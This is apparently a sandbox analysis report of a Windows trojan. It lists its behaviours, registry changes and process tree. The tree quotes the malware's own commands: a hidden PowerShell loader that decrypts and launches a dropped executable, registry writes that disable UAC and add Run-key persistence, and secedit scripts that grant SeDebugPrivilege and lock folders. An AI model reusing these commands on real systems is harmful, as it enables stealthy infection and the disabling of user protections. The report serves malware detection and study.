f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b

Analysis

max time kernel
151s
max time network
152s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/11/2024, 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe
Size

121.2MB
MD5

70d8d97da1f076e1fdec3743bb684cd3
SHA1

de173e4d535b5ddd1bb1c0dad5191ca2cf92a25a
SHA256

f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b
SHA512

e0d1406a69d17e16615d2c55906bd0bd7fa35b40a478badb8a283941714523881ca3df832e9af0a5792dfedf8e7242c05d595580c7556e9d102f538306593fa5
SSDEEP

3145728:rAEAnnqnfyo/2oA6WC8GrZdqQvQp7Nr7a0gz2b:bZyo0YrZdqQk7Nr7ah

Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2900	powershell.exe
2372	powershell.exe
2260	powershell.exe
628	powershell.exe
2768	powershell.exe
2632	powershell.exe
108	powershell.exe
2072	powershell.exe
2832	powershell.exe
2604	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
340	irsetup.exe
1864	iusb3mon.exe

Loads dropped DLL 3 IoCs

pid	Process
1740	f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe
340	irsetup.exe
340	irsetup.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000004e74-72.dat	upx
behavioral1/memory/1864-73-0x0000000000400000-0x000000000053F000-memory.dmp	upx
behavioral1/memory/1864-221-0x0000000000400000-0x000000000053F000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\product1\Quickq-Win10_Win11.exe	irsetup.exe
File opened for modification	C:\Program Files\product1\Quickq-Win10_Win11.exe	irsetup.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 5 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2832	powershell.exe
2604	powershell.exe
2768	powershell.exe
2632	powershell.exe
2372	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iusb3mon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2108	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
340	irsetup.exe
2900	powershell.exe
2372	powershell.exe
2768	powershell.exe
2832	powershell.exe
2604	powershell.exe
2632	powershell.exe
2900	powershell.exe
2900	powershell.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
108	powershell.exe
628	powershell.exe
2072	powershell.exe
2260	powershell.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe
1864	iusb3mon.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
340	irsetup.exe
340	irsetup.exe
1864	iusb3mon.exe
1864	iusb3mon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1740 wrote to memory of 340	1740	f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe	30
PID 1740 wrote to memory of 340	1740	f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe	30
PID 1740 wrote to memory of 340	1740	f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe	30
PID 340 wrote to memory of 2900	340	irsetup.exe	31
PID 340 wrote to memory of 2900	340	irsetup.exe	31
PID 340 wrote to memory of 2900	340	irsetup.exe	31
PID 340 wrote to memory of 2768	340	irsetup.exe	32
PID 340 wrote to memory of 2768	340	irsetup.exe	32
PID 340 wrote to memory of 2768	340	irsetup.exe	32
PID 340 wrote to memory of 2632	340	irsetup.exe	35
PID 340 wrote to memory of 2632	340	irsetup.exe	35
PID 340 wrote to memory of 2632	340	irsetup.exe	35
PID 340 wrote to memory of 2372	340	irsetup.exe	36
PID 340 wrote to memory of 2372	340	irsetup.exe	36
PID 340 wrote to memory of 2372	340	irsetup.exe	36
PID 340 wrote to memory of 2832	340	irsetup.exe	39
PID 340 wrote to memory of 2832	340	irsetup.exe	39
PID 340 wrote to memory of 2832	340	irsetup.exe	39
PID 340 wrote to memory of 2604	340	irsetup.exe	40
PID 340 wrote to memory of 2604	340	irsetup.exe	40
PID 340 wrote to memory of 2604	340	irsetup.exe	40
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 2900 wrote to memory of 1864	2900	powershell.exe	43
PID 1864 wrote to memory of 108	1864	iusb3mon.exe	44
PID 1864 wrote to memory of 108	1864	iusb3mon.exe	44
PID 1864 wrote to memory of 108	1864	iusb3mon.exe	44
PID 1864 wrote to memory of 108	1864	iusb3mon.exe	44
PID 1864 wrote to memory of 628	1864	iusb3mon.exe	45
PID 1864 wrote to memory of 628	1864	iusb3mon.exe	45
PID 1864 wrote to memory of 628	1864	iusb3mon.exe	45
PID 1864 wrote to memory of 628	1864	iusb3mon.exe	45
PID 1864 wrote to memory of 2260	1864	iusb3mon.exe	47
PID 1864 wrote to memory of 2260	1864	iusb3mon.exe	47
PID 1864 wrote to memory of 2260	1864	iusb3mon.exe	47
PID 1864 wrote to memory of 2260	1864	iusb3mon.exe	47
PID 1864 wrote to memory of 2072	1864	iusb3mon.exe	48
PID 1864 wrote to memory of 2072	1864	iusb3mon.exe	48
PID 1864 wrote to memory of 2072	1864	iusb3mon.exe	48
PID 1864 wrote to memory of 2072	1864	iusb3mon.exe	48
PID 1864 wrote to memory of 1656	1864	iusb3mon.exe	49
PID 1864 wrote to memory of 1656	1864	iusb3mon.exe	49
PID 1864 wrote to memory of 1656	1864	iusb3mon.exe	49
PID 1864 wrote to memory of 1656	1864	iusb3mon.exe	49
PID 2072 wrote to memory of 2352	2072	powershell.exe	54
PID 2072 wrote to memory of 2352	2072	powershell.exe	54
PID 2072 wrote to memory of 2352	2072	powershell.exe	54
PID 2072 wrote to memory of 2352	2072	powershell.exe	54
PID 108 wrote to memory of 2248	108	powershell.exe	55
PID 108 wrote to memory of 2248	108	powershell.exe	55
PID 108 wrote to memory of 2248	108	powershell.exe	55
PID 108 wrote to memory of 2248	108	powershell.exe	55
PID 628 wrote to memory of 2380	628	powershell.exe	56
PID 628 wrote to memory of 2380	628	powershell.exe	56
PID 628 wrote to memory of 2380	628	powershell.exe	56
PID 628 wrote to memory of 2380	628	powershell.exe	56
PID 2260 wrote to memory of 2024	2260	powershell.exe	57
PID 2260 wrote to memory of 2024	2260	powershell.exe	57
PID 2260 wrote to memory of 2024	2260	powershell.exe	57
PID 2260 wrote to memory of 2024	2260	powershell.exe	57

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

C:\Users\Admin\AppData\Local\Temp\f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe
"C:\Users\Admin\AppData\Local\Temp\f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5708146 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\f3409c2f76b6f62ee8825da54c44673077a1d3bb050bed9a24b5169754a8073b.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3290804112-2823094203-3137964600-1000"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\ProgramData\Program\iusb3mon.exe
      "C:\ProgramData\Program\iusb3mon.exe" $false
      4⤵
      UAC bypass
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:1864
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:108
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2248
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:628
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2380
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2024
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2072
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2352
